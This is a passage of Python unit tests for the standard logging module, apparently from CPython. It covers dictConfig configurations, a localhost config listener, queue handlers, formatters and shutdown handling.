'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
hyphenated = logging.getLogger('compiler-hyphenated')
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
with support.captured_stdout() as output:
self.setup_via_listener(to_send)
logger = logging.getLogger("compiler.parser")
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
self.records.append(record)
class ShutdownTest(BaseTest):
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
